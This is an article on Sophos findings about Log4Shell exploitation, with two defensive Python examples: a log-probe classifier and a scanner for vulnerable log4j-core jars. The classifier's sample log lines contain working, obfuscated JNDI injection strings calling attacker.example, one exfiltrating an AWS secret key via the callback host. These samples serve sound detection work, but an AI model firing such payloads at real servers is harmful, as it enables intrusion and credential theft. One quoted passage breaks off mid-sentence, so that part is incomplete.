Security firm Sophos has provided new threat intelligence on how cyberattackers are already exploiting, or attempting to exploit, unpatched systems. This follows the reporting of the Apache Log4j vulnerability known as Log4Shell, now officially designated CVE-2021-44228.
The Log4Shell vulnerability involves sending a request to a vulnerable server that includes some data, for example an HTTP header, that the attacker expects the server will write to its log file via Log4j. If that data contains a JNDI lookup string, affected Log4j versions resolve it at logging time, contacting an attacker-controlled server (typically over LDAP or RMI) and loading attacker-supplied code from it.
The Sophos threat intelligence, detailed in the SophosLabs Uncut report “Log4Shell Hell: Anatomy of an Exploit Outbreak”, shows that Sophos is seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far.
It also reveals that cryptomining botnets are among the earliest “attack” adopters; these botnets focus on Linux server platforms, which are particularly exposed to this vulnerability. Sophos has also seen attempts to extract information from services, including Amazon Web Services keys and other private data. It has observed that attempts to exploit network services start with probes of several different types.
Around 90 percent of the probes Sophos detected were focused on the Lightweight Directory Access Protocol (LDAP). A smaller number of probes targeted Java’s Remote Method Invocation (RMI) interface, but Sophos researchers noted that there seems to be a larger variety of unique RMI-related attempts.
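The probe breakdown above (LDAP versus RMI, plus the earlier point about attempts to pull AWS keys) is the kind of picture a defender can build from their own access logs. The following Python is an added example, not code from the Sophos report or from this article: it normalises the obfuscation tricks attackers wrap around the `${jndi:...}` string (URL encoding, `${lower:}`/`${upper:}` wrappers, and the `${...:-x}` default-value syntax) before matching, classifies each probe by the JNDI protocol it names, and flags payloads that embed `${env:...}`-style lookups in the callback host name, which is how key exfiltration over the callback itself works. The log lines, IP addresses and `attacker.example` host are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample access-log lines (host names and IPs are placeholders).
# Lines 1, 2 and 6 carry LDAP probes, lines 3 and 4 RMI probes; line 5 is benign.
LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fo%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/y}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker.example/a}"',
]

# Innermost Log4j lookup wrappers used to disguise the literal "jndi":
#   ${lower:j} / ${upper:j}      -> j / J
#   ${::-j}, ${env:NOPE:-j}      -> j   (the ":-default" syntax)
_WRAPPER = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE
)
_JNDI = re.compile(r"\$\{jndi:([a-z]+):")
_LEAK = re.compile(r"\$\{(?:env|sys|java):")


def normalize(line: str) -> str:
    """URL-decode, then unwrap obfuscation from the inside out until stable."""
    s = unquote(line)
    prev = None
    while prev != s:
        prev = s
        s = _WRAPPER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s.lower()


def _lookup_at(norm: str, start: int) -> str:
    """Return the ${...} expression beginning at `start`, honouring nesting."""
    depth = 0
    for i in range(start, len(norm)):
        if norm.startswith("${", i):
            depth += 1
        elif norm[i] == "}":
            depth -= 1
            if depth == 0:
                return norm[start:i + 1]
    return norm[start:]


def classify(line: str):
    """Return {'protocol', 'payload', 'exfil'} for a Log4Shell probe, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    payload = _lookup_at(norm, m.start())
    return {
        "protocol": m.group(1),  # ldap, ldaps, rmi, dns, ...
        "payload": payload,
        # Lookups left inside the callback host (env/sys/java) mean the probe
        # is trying to leak data such as cloud keys through the callback itself.
        "exfil": bool(_LEAK.search(payload)),
    }


def tally(lines):
    """Count probes per JNDI protocol, plus how many carry exfiltration lookups."""
    counts = Counter()
    for line in lines:
        hit = classify(line)
        if hit:
            counts[hit["protocol"]] += 1
            if hit["exfil"]:
                counts["exfil"] += 1
    return counts


if __name__ == "__main__":
    for line in LOGS:
        print(classify(line))
    print(dict(tally(LOGS)))
```

Matching on the raw string `${jndi:` would miss four of the five probes above; the normalisation loop is what makes the classification meaningful. The wrapper list covers the common evasions only, so treat a hit as high confidence and a miss as inconclusive.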
Sophos expects adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging the vulnerability for ransomware.
“The Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell
Sean adds that, with the exception of cryptomining, there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability.
“We expect adversaries are likely grabbing as much access to whatever they can get right now, with a view to monetizing and/or capitalizing on it later on.”
The most immediate priority for defenders, he says, is to reduce exposure by patching and mitigating all corners of their infrastructure, and to investigate exposed and potentially compromised systems.
“This vulnerability can be everywhere.”
“Where systems have been identified as vulnerable, defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third-party vendors who may also be at risk,” Sean adds.
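The “patch all corners” priority above is harder than it sounds because log4j-core is frequently bundled inside application archives (a jar inside a war inside an ear) that the operating system’s package manager never sees. The following Python is an added example, not tooling from Sophos or from this article: it walks a directory tree, opens every jar/war/ear it finds, recurses into archives nested inside archives, reads the log4j-core version from its Maven `pom.properties`, and reports whether `JndiLookup.class` is still present, the class Apache’s mitigation advice said to delete from the jar where an upgrade was not possible. The archives it scans are constructed in a temporary directory by `build_fixture`; the version `2.14.1` and the file names are assumptions for illustration.

```python
import io
import os
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def inspect_archive(data: bytes, path: str, findings: list) -> None:
    """Look inside one archive, and any archives nested in it, for log4j-core."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(zf.namelist())
    if JNDI_CLASS in names or POM_PROPS in names:
        version = "unknown"
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({
            "path": path,
            "version": version,
            # The class that performs JNDI lookups; Apache's advisory listed
            # removing it from the jar as the mitigation when upgrading was not possible.
            "jndi_lookup": JNDI_CLASS in names,
        })
    for name in names:
        if name.lower().endswith(ARCHIVE_EXTS):
            inspect_archive(zf.read(name), f"{path}!/{name}", findings)


def scan(root: str) -> list:
    """Walk a directory tree and report every embedded log4j-core found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXTS):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    inspect_archive(fh.read(), p, findings)
    return findings


def build_fixture(root: str) -> None:
    """Constructed sample data (assumed names/versions): a war bundling an
    unmitigated log4j-core 2.14.1, and a standalone copy from which
    JndiLookup.class has been deleted."""
    def log4j_core(with_jndi: bool) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, "version=2.14.1\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # stand-in class bytes
        return buf.getvalue()

    os.makedirs(os.path.join(root, "webapps"), exist_ok=True)
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", log4j_core(True))
    with open(os.path.join(root, "webapps", "app.war"), "wb") as fh:
        fh.write(war.getvalue())
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
        fh.write(log4j_core(False))


def demo() -> list:
    """Build the fixture in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run `scan("/opt")` or similar against a real host and compare each reported version with the fix version in Apache’s current Log4j security advisory; a copy with `jndi_lookup` still true and a pre-fix version is an unmitigated instance regardless of what the package manager says is installed.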